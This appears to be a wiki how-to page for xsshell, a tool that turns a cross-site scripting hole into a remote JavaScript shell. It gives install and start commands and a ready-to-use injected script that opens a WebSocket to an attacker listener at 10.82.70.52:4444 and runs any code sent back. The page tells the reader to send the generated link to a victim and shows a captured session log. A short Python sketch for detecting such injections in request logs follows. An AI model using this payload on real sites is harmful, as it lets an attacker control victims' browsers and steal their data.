Xsshell

From Xinux Wiki

git clone

  • sudo apt-get install golang-go
  • go get github.com/raz-varren/xsshell
  • go install github.com/raz-varren/xsshell

start

  • ./xsshell -host 127.0.0.1 -port 4444

xsshell -h

Usage of xsshell:

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   	working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

  • The payload must be entered into the input field
  • The generated link is sent to the victim


JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>

The shell

start socket: 1, header: AqHFTtA=

socket connected: 1

   user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 
   page url:   http://127.0.0.1/xss.php?msg=%3Cscript%3E%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22ws%3A%2F%2F10.82.70.52%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3C%2Fscript%3E&submit=klick 
   referrer:   http://127.0.0.1/xss.php?msg=%3Cscript%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22http%3A%2F%2F10.82.70.59%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3E%3C%2Fscript%3E&submit=klick
   cookies:    
end socket: 1, header: AqHFTtA=
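
The `page url` field in the session log above shows the payload arriving URL-encoded in the `msg` query parameter, which is also what a web server access log or a WAF sees. The following detection sketch is an added example, not part of the original wiki page or the xsshell project; the function names and the shortened sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote_plus, unquote_plus, urlencode, urlsplit

# A WebSocket constructor called with a literal ws:// or wss:// URL.
WS_CTOR = re.compile(r"""new\s+WebSocket\s*\(\s*["'](wss?://[^"'\s]+)["']""", re.I)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ws_injection(url):
    """Return (parameter, endpoint) pairs for query parameters that carry a
    script tag opening a WebSocket to a host other than the page's own."""
    page = urlsplit(url)
    findings = []
    for name, value in parse_qsl(page.query, keep_blank_values=True):
        text = fully_decode(value)  # parse_qsl has already decoded once
        if not SCRIPT_TAG.search(text):
            continue
        for endpoint in WS_CTOR.findall(text):
            if urlsplit(endpoint).hostname != page.hostname:
                findings.append((name, endpoint))
    return findings


# Constructed sample requests, modelled on the "page url" log field above
# (same host, parameter and listener address; script body shortened).
SAMPLE_TAG = '<script>var d=new WebSocket("ws://10.82.70.52:4444/s")</script>'
BASE = "http://127.0.0.1/xss.php?"
SAMPLES = [
    BASE + urlencode({"msg": SAMPLE_TAG, "submit": "klick"}),
    BASE + urlencode({"msg": quote_plus(SAMPLE_TAG)}),  # double-encoded
    BASE + "msg=hello&submit=klick",                    # benign request
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(find_ws_injection(sample) or "clean", "<-", sample[:60])
```

A match in request logs indicates an injection attempt, not successful execution; the fix remains output encoding of `msg` in the vulnerable page.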

On the client

[Image: Xss-poc-js-sh1.png]
